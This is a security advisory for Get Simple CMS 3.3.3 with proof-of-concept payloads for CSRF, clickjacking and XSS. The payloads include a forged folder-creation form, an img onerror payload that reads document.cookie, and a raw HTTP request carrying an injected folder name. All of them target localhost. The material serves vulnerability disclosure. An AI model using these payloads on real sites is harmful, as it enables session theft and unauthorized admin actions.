Get Simple CMS 3.3.3 CSRF / XSS / Clickjacking

2014.09.24
Credit: JoeV
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#Affected Vendor: http://get-simple.info/ #Date: 23/09/2014 #Discovered by: JoeV #Type of vulnerability: CSRF, Click-jacking, DOM based XSS and XSS #Tested on: Windows 7 #Version : 3.3.3 #Description: Get Simple CMS v 3.3.3 is susceptible to multiple vulnerabilities such as CSRF, Click-jacking, DOM based XSS and XSS. Proof of Concept (PoC): --------------------------- 1) CSRF --------- <form method="GET" name="form0" action=" http://localhost:80/admin/upload.php?path=&nonce=538380793c11d2f81601a05eee834cd1d2c38fee&newfolder=jack "> <input type="hidden" name="name" value="value"/> </form> 2) Click-jacking ------------------ <iframe src="http://localhost/admin/" sanboxed width=900 height=900> I AM BLIND !!!! </iframe> 3) DOM based XSS (Themes) ---------------------------------- <div id="sidebar"> <div class="section"> <?php get_component('sidebar'); ?> </div> <div class="section credits"> <p><?php echo date('Y'); ?> - <strong><?php get_site_name(); ?></strong></p> <p> Cardinal Theme by <a href="http://www.cagintranet.com" >Cagintranet</a><br /> "><img src=d onerror=javascript:alert(document.cookie);> <?php get_site_credits(); ?> </p> </div> </div> <div class="clear"></div> <?php get_footer(); ?> </div><!-- end wrapper --> 4) XSS on Files (Create Folder) ------------------------------------ GET /admin/upload.php?path=&nonce=538380793c11d2f81601a05eee834cd1d2c38fee&newfolder=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36 Referer: http://localhost/admin/upload.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: iconSize=16x16; hudson_auto_refresh=true; /modules/system/admin.php_SystemAutotasks_sortsel=sat_name; /modules/system/admin.php_SystemAutotasks_ordersel=ASC; /modules/system/admin.php_limitsel=15; /modules/system/admin.php_SystemAutotasks_filtersel=default; cookies_on=1; __atuvc=2%7C39; 2c83ccac291e27547de553cb57bc48530615cd78=22dd15ba66e19f2d0ccb10eb046cf7c0ad0d6b14; GS_ADMIN_USERNAME=admin If-Modified-Since: Tue, 23 Sep 2014 15:00:08 GMT


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top